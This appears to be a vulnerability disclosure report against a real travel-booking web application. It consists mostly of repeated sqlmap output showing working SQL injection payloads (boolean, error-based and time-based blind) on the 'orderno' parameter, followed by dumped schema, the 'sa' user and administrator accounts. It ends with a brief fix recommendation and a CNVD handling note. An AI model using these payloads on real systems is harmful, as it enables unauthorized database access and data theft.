(CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: YeeSoHo_4.0Table: V4_Ysta_SubsOrderNo[70 columns]+------------------+-----------+| Column | Type |+------------------+-----------+| AcceptSt | char || Address | nvarchar || AirLines | varchar || ArrivalDate | varchar || AuditingDt | datetime || AuditingMan | varchar || AuditingSt | char || BalanceMoney | money || BelongCustomer | int || BoardPoint | varchar || BookingMan | varchar || Carrier | varchar || Carriers | varchar || CheckSt | char || CreateDt | datetime || CustomerName | varchar || CustomerNo | varchar || CustomerType | char || DealDepID | int || DepartureDt | datetime || DepID | int || DepType | char || DiffDt | int || FlowStatus | char || FlowStep | varchar || FltDate | varchar || FltDateTime | datetime || Gain | money || GathingDt | datetime || GathingMan | varchar || GathingSt | char || InsMoney | money || InsNetPrice | money || InvoinceMoney | float || InvoinceTitle | nvarchar || IsCancel | char || IsDomc | char || IsSelected | int || LinkerID | nvarchar || ModifyDt | datetime || ModifyTag | timestamp || NetPrice | money || OffPoint | varchar || OID | int || OpID | varchar || OrderNo | varchar || OrderSource | varchar || PayType | varchar || PNR | varchar || Pnrs | varchar || PointGain | money || PrintAddr | varchar || PrintAddrName | varchar || Prompt | datetime || ProviderCustomer | int || PsrName | nvarchar || RefundSt | varchar || Remark | nvarchar || SalePointID | int || SalePointName | varchar || SalesID | varchar || SendStatus | char || SendTktDepID | int || SendTktDepName | varchar || SendTktsTypeCode | varchar || SubsOrderNo | varchar || SuspendedSt | char || TicketMan | varchar || TicketSt | char || UserID | varchar |+------------------+-----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'sa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008database management system users privileges:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] distributor_admin (administrator)[*] ReplicationYeesoho[*] sa (administrator)[*] yeesoho (administrator)sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008SELECT COUNT(*) FROM Change_SubsOrderNo_BK : '1'SELECT COUNT(*) FROM [1]:SELECT COUNT(*) FROM YeeSoHo_4.0 [1]:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008SELECT COUNT(*) FROM Change_SubsOrderNo_BK : '1'SELECT COUNT(*) FROM V4_YW_RefundAirOrders_OrderNo: '270414'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
过滤好字符 并且增加验证权限
危害等级:高
漏洞Rank:10
确认时间:2015-07-03 15:07
CNVD确认所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。
暂无
